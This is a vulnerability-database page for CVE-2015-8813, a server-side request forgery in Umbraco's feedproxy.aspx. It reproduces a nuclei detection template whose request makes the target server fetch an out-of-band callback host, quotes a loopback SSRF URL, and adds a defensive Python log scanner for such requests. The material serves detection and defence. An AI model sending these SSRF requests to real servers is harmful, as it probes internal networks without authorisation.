
Umbraco <7.4.0 - Server-Side Request Forgery

19 Jun 2026 11:10:26 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Umbraco <7.4.0 - Server-Side Request Forgery. A vulnerability in feedproxy.aspx allows unauthorized HTTP GET requests, potentially leading to data breaches.

Related

Reporter | Title | Published | Family
CNVD | Umbraco CMS Security Bypass Vulnerability | 24 Feb 2016 00:00 | cnvd
CVE | CVE-2015-8813 | 3 Mar 2017 16:00 | cve
Cvelist | CVE-2015-8813 | 3 Mar 2017 16:00 | cvelist
Github Security Blog | Umbraco CMS vulnerable to CSRF | 17 May 2022 02:56 | github
NVD | CVE-2015-8813 | 3 Mar 2017 16:59 | nvd
OSV | GHSA-X34J-WXQ8-7VCM Umbraco CMS vulnerable to CSRF | 17 May 2022 02:56 | osv
Prion | Server side request forgery (ssrf) | 3 Mar 2017 16:59 | prion
VulnCheck KEV | VulnCheck KEV: CVE-2015-8813 | 19 Sep 2024 00:00 | vulncheck_kev

Code

id: CVE-2015-8813

info:
  name: Umbraco <7.4.0- Server-Side Request Forgery
  author: emadshanab
  severity: high
  description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
  impact: |
    The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
  remediation: |
    Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
  reference:
    - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
    - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
    - http://www.openwall.com/lists/oss-security/2016/02/18/8
    - http://issues.umbraco.org/issue/U4-7457
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2015-8813
    cwe-id: CWE-918
    epss-score: 0.11595
    epss-percentile: 0.95491
    cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: umbraco
    product: umbraco
  tags: cve2015,cve,ssrf,oast,umbraco,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450221009a6f911329aa4e236e194bfc88e244f43f5853dd887bb3f7a6d4c811b59633b5022025cec2e7db323435ffaa9739c19da5d75799631be1c25c2430e93d5316a8fc39:922c64590222798bb761d5b6d8e72950
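
Added example (not part of the nuclei template above or of the Umbraco project): a log check a defender can run over IIS W3C logs to find the request pattern this template probes for, that is, hits on /Umbraco/feedproxy.aspx whose url parameter points at an internal address or at a host outside an expected feed allowlist. The log lines, the field layout and the ALLOWED_FEED_HOSTS allowlist are constructed assumptions.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist of feed hosts this site legitimately proxies (assumption).
ALLOWED_FEED_HOSTS = {"feeds.example.org"}

# Constructed IIS W3C log sample (not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2016-02-20 10:01:07 GET /Umbraco/feedproxy.aspx url=http://feeds.example.org/rss 203.0.113.5 200
2016-02-20 10:02:11 GET /umbraco/feedproxy.aspx url=http://127.0.0.1:80/index 203.0.113.9 200
2016-02-20 10:02:40 GET /Umbraco/feedproxy.aspx url=http%3A%2F%2F10.0.0.12%3A8080%2Fadmin 203.0.113.9 200
2016-02-20 10:03:02 GET /Umbraco/feedproxy.aspx url=http://abc123.oast.example/ 198.51.100.7 200
2016-02-20 10:03:30 GET /index.aspx - 198.51.100.7 200
"""

def classify_target(url):
    """Return a reason string if the proxied URL is suspicious, else None."""
    try:
        host = urlsplit(url).hostname
    except ValueError:  # e.g. malformed IPv6 literal
        host = None
    if not host:
        return "unparseable target"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: accept only hostnames on the feed allowlist.
        return None if host in ALLOWED_FEED_HOSTS else "host not in feed allowlist"
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return "internal address"
    return "IP-literal target"

def find_feedproxy_ssrf(log_text):
    """Return [(client_ip, target_url, reason)] for suspicious feedproxy.aspx hits."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != "/umbraco/feedproxy.aspx":
            continue
        # parse_qs percent-decodes the value, so encoded targets are covered too.
        for url in parse_qs(row.get("cs-uri-query", "")).get("url", []):
            reason = classify_target(url)
            if reason:
                hits.append((row.get("c-ip"), url, reason))
    return hits
```

On the constructed sample, find_feedproxy_ssrf(SAMPLE_LOG) flags the loopback, RFC 1918 and non-allowlisted requests and leaves the allowlisted feed fetch alone.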

Scores (04 Feb 2026 07:00, Current)
Vulners AI Score: 7.4 (High risk)
CVSS 2: 4.3
CVSS 3: 8.2
EPSS: 0.11595